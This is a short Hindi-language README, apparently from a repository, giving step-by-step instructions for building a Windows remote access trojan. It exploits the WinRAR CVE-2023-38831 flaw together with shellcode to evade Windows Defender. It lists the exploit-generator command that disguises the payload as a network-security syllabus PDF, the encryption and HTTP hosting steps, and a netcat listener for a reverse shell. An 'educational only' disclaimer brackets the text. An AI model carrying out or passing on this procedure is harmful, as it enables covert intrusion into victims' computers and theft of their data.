
विंडोज x64 के लिए रिमोट एक्सेस ट्रोजन (RAT) जो कमजोरी CVE-2023-38831 (WinRAR < 6.23 कमजोरी) और Shellcode शोषण तकनीक के संयोजन का उपयोग करता है।
Windows Defender को बायपास करने के लिए CVE-2023-38831 (WinRAR < 6.23) और शेलकोड शोषण का उपयोग करके एक Windows x64 RAT विकसित करना।
चेतावनी: यह जानकारी केवल शैक्षिक उद्देश्यों के लिए है। इन तकनीकों का अनधिकृत उपयोग अवैध और अनैतिक है।
शेलकोड तैयार करें
51721.py का उपयोग करें।शेलकोड को संशोधित और संकलित करें
निष्पादन योग्य को एन्क्रिप्ट करें
decrypt_file.ps1 का उपयोग करें:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
WinRAR आर्काइव बनाएं
cve-2023-38831-exp-gen.py का उपयोग करें:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
फ़ाइल डाउनलोड के लिए Python सर्वर सेट अप करें
enc_main.exe और decrypt_file.ps1 वाले निर्देशिका पर जाएं।python3 -m http.server 8000
रिवर्स TCP शेल सुनने की तैयारी करें
nc -lnvp 4444
रिवर्स TCP शेल ट्रिगर करें
यह जानकारी केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। इस शोषण का स्पष्ट अनुमति के बिना उपयोग अवैध और अनैतिक है। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।